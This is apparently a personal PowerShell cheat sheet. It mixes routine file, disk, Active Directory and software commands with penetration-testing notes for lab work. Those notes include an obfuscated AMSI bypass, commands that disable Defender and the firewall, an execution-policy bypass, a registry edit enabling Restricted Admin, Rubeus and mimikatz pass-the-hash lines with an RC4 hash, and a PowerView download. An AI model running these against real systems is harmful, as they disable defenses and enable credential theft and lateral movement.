Skip to content

Powershell

Basic commands

# List users of Administrator group
net localgroup Administrators

# List contents
dir
Get-ChildItem -Force
# -Force: Display hidden files 
gci
# Short variant of dir

# Count files from a directory
(Get-ChildItem -File -Recurse | Measure-Object).Count

# Find specific items from the directory specified by the Path parameter that contains the string cred.
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

# Print working directory
pwd
Get-Location

# Change directory
cd
cd ..           // it gets you up one level
cd ..\brotherdirectory  // go to a brother directory
cd ~\Desktop        // go to logged user's Desktop

# Creates folder
mkdir nameOfFolder
New-Item -ItemType Directory nameOfDirectory

# Display all commands saved in a file
history
Get-history

# Browse the command history
CTRL-R

# Select-String: The `Select-String` cmdlet uses regular expression matching to search for text patterns in input strings and files. We can use `Select-String` similar to `grep` in UNIX or `findstr.exe` in Windows.
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List



# Clear screen
clear
Clear-Host

# Copy item
cp nameOfSource nameOfDestiny
Copy-Item nameOfSource nameOfDestiny

# Copy a folder and its content
cp originFolder destinyPath -Recurse
Copy-Item originFolder destinyPath -Recurse

# Get running processes filtered by name
get-process -name ccSvcHst

# Kill processes called ccSvcHst* // Notice here wild card *
taskkill /f /im ccSvcHst*

# Remove a file
rm nameofFile -Recurse
# -Recurse: Remove it recursively (in a folder)

# Display content of a file
cat nameofFile
Get-Content nameofFile

# Display one page of a file at a time
more nameofFile

# Display the first lines of a file
head nameofFile

# Open a file with an app
start nameofApp nameofFile

# Runs commands or expressions on the local computer.
$Command = "Get-Process"
Invoke-Expression $Command
# PS uses Invoke-Expression to evaluate the string. Otherwise the output of $Command would be the text "Get-Process". Invoke-Expression is similar to $($command) in linux.
# IEX is an alias


# Gets content from a web page on the internet.
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
# alias: `iwr`, `curl`, and `wget`

Basic commands for reconnaissance and enumeration

System, users, permissions

# Display Powershell relevant Powershell version information
echo $PSVersion
echo ~PSVersionTable


#You can tell if PowerShell is running with administrator privileges (a.k.a “elevated” rights) with the following snippet:
[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544'

# Retrieves the WindowsIdentity for the currently running user.
[Security.Principal.WindowsIdentity]::GetCurrent() 

# Access the groups property of the identity to find out what user groups the identity is a member of.
[Security.Principal.WindowsIdentity]::GetCurrent()(...).groups

# It returns true if groups contains the Well Known SID of the Administrators group (the identity will only contain it if “run as administrator” was used) and otherwise false.
[Security.Principal.WindowsIdentity]::GetCurrent() -contains "S-1-5-32-544" 

# List disabled users with LDAP
Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select name

Processes

# List which processes are elevated:
Get-Process | Add-Member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated

# List installed software on a computer
get-ciminstance win32_product | fl

Run a utility as another user

# Run an utility as another user with rubeus. Passing clear text credentials
rubeus.exe asktgt /user:jackie.may /domain:htb.local /dc:10.10.110.100 /rc4:ad11e823e1638def97afa7cb08156a94

# Run an utility as another user with mimikatz.exe. Passing clear text credentials
mimikatz.exe sekurlsa::pth /domain:htb.local /user:jackie.may /rc4:ad11e823e1638def97afa7cb08156a94

Policies and antivirus

# Enumerate AppLocker policies 
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

# Quickly enumerate whether we are in Full Language Mode or Constrained Language Mode.
$ExecutionContext.SessionState.LanguageMode

# Check current execution policy. If the answer is
# - "Restricted": Ps scripts cannot run.
# - "RemoteSigned": Downloaded scripts will require the script to be signed by a trusted publisher.
Get-Execution-Policy

# Bypass execution policy
powershell -ep bypass

# Get the current Defender status.
Get-MpComputerStatus

# Deactivate antivirus from powershell session (if user has rights to do so)
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable firewall
netsh advfirewall set allprofiles state off

# Bypass AMSI
**S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )**

# Add a registry
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Connect to a share

# The command New-PSDrive connects a computer to or disconnects a computer from a shared resource or displays information about computer connections.
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"

# Connect/ Disconnect a share with user and password
$username = 'plaintext'
$password = 'Password123'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred

Advance queries in Powershell

The four types of Wildcards in powershell:

The * wildcard will match zero or more characters

The ? wildcard will match a single character

[m-n] Match a range of characters from m to n, so [f-m]ake will match fake/jake/make

[abc] Match a set of characters a,b,c.., so [fm]ake will match fake/make

Filters

Filters are a way to power up our queries in powershell.

Example: We can use the Filter parameter with the notlike operator to filter out all Microsoft software (which may be useful when enumerating a system for local privilege escalation vectors).

get-ciminstance win32_product -Filter "NOT Vendor like '%Microsoft%'" | fl

The Filter operator requires at least one operator:

Filter Meaning
-eq Equal to
-le Less than or equal to
-ge Greater than or equal to
-ne Not equal to
-lt Less than
-gt Greater than
-approx
-bor Bitwise OR
-band Bitwise AND
-recursivematch Recursive match
-like Like
-notlike Not like
-and Boolean AND
-or Boolean OR
-not Boolean NOT

When using filters, certain characters must be escaped:

Character Escaped As Note
`” Only needed if the data is enclosed in double-quotes.
\’ Only needed if the data is enclosed in single quotes.
NULL \00 Standard LDAP escape sequence.
\ \5c Standard LDAP escape sequence.
* \2a Escaped automatically, but only in -eq and -ne comparisons. Use -like and - notlike operators for wildcard comparison.
( /28 Escaped automatically.
) /29 Escaped automatically.
/ /2f Escaped automatically.

Filter Examples: AD Object Properties

The filter can be used with operators to compare, exclude, search for, etc., a variety of AD object properties. Filters can be wrapped in curly braces, single quotes, parentheses, or double-quotes. For example, the following simple search filter using Get-ADUser to find information about the user "Sally Jones" can be written as follows:

Get-ADUser Filter "name -eq 'sally jones'"
Get-ADUser -Filter {name -eq 'sally jones'}
Get-ADUser -Filter 'name -eq "sally jones"'

As seen above, the property value (here, sally jones) can be wrapped in single or double-quotes.

# The asterisk (`*`) can be used as a wildcard when performing queries. 
Get-ADUser -filter {-name -like "joe*"}
# it return all domain users whose name start with `joe` (joe, joel, etc.).

Disk Management

# Show disks
Get-Disk

# Show disks in a more humanly mode
Get-disk | FT -AutoSize

# Show partitions from a disk
Get-Partition -DiskNumber 1

# Create partition
New-Partition -DiskNumber 1 -Size 50GB -AssignDriveLetter

# Show volume
Get-volume -DriveLetter e

# Format Disk and assign file system
Format-volume -DriveLetter E -FileSystem NTFS

# Delete Partition 
Remove-Partition -DriveLetter E

Disk Management with diskpart

Diskpart is a command interpreter that helps you manage your computer's drivers. How it works? Before using diskpart commands, you usually have to list and select the object you want to operate on.

# To enter in diskpart command interpreter
diskpart

# Enumerate disk
list disk

# Select disk
select disk 0

# Enumerate volumes
list volume

# Select volume
select volume 1

# Enumerate partitions
list partition

# Select partition
select partition 2

# Extend a volume (once you have it selected)
extend size=2048

# Shring a volume (once you have it selected)
shrink desired=2048

Howtos

How to delete shortcuts from Public Desktop

# Instead of "everyone" set the group that you prefer
$acl = Get-ACL “C:\Users\Public\Desktop”

$rule=new-object System.Security.AccessControl.FileSystemAccessRule (“everyone”,”FullControl”, “ContainerInherit,ObjectInherit”, “None”, “Allow”)

$acl.SetAccessRule($rule)

Set-ACL “C:\Users\Public\Desktop” $acl

How to uninstall winzip from powershell line of command

# Show all software installed:
Get-WmiObject -Class win32_product

# Find winzip object
Get-WmiObject -Class win32_product | where { $_.Name -like "*Winzip*"}

# Create a variable for  the object
$wzip = Get-WmiObject -Class win32_product | where { $_.Name -like "*Winzip*"}

# Uninstall it:
msiexec /x  $wzip.localpackage /passive

This will start un-installation of Winzip and will show only the Progress bar only {because we are using msiexex’s /passive switch”

Last update: 2024-11-17
Created: January 1, 2023 21:59:36